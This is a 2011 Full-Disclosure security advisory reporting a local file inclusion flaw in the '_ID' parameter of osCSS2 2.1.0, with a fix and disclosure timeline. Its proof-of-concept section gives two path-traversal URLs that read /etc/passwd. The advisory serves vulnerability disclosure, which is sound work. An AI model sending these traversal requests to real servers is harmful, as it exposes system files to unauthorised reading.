[Full-disclosure] osCSS2 "_ID" parameter Local file inclusion
SSchurtz at t-online.de
SSchurtz at t-online.de
Wed Nov 9 11:34:38 GMT 2011
Advisory: osCSS2 "_ID" parameter Local file inclusion
Advisory ID: SSCHADV2011-034
Author: Stefan Schurtz
Affected Software: Successfully tested on osCSS2 2.1.0 (latest
version)
Vendor URL: http://oscss.org/
Vendor Status: Fixed in svn branche 2.1.0 and reported in develop
version 2.1.1
==========================
Vulnerability Description
==========================
osCSS2 2.1.0 "_ID" parameter is prone to a LFI vulnerability
==================
PoC-Exploit
==================
http://<target>/catalog/shopping_cart.php?_ID=../../../../../../../../../../../etc/passwd
http://<target>/catalog/content.php?_ID=../../../../../../../../../../../etc/passwd
=========
Solution
=========
Fixed in svn branche 2.1.0 and reported in develop version 2.1.1
====================
Disclosure Timeline
====================
08-Nov-2011 - informed vendor
08-Nov-2011 - release date of this security advisory
08-Nov-2011 - fixed by vendor
08-Nov-2011 - post on BugTraq
========
Credits
========
Vulnerability found and advisory written by Stefan Schurtz.
===========
References
===========
http://oscss.org/
http://forums.oscss.org/2-security/oscss2-id-parameter-local-file-inclusion-t1999.html
http://dev.oscss.org/task/892
http://www.rul3z.de/advisories/SSCHADV2011-034.txt
Full-Disclosure is hosted and sponsored by Secunia.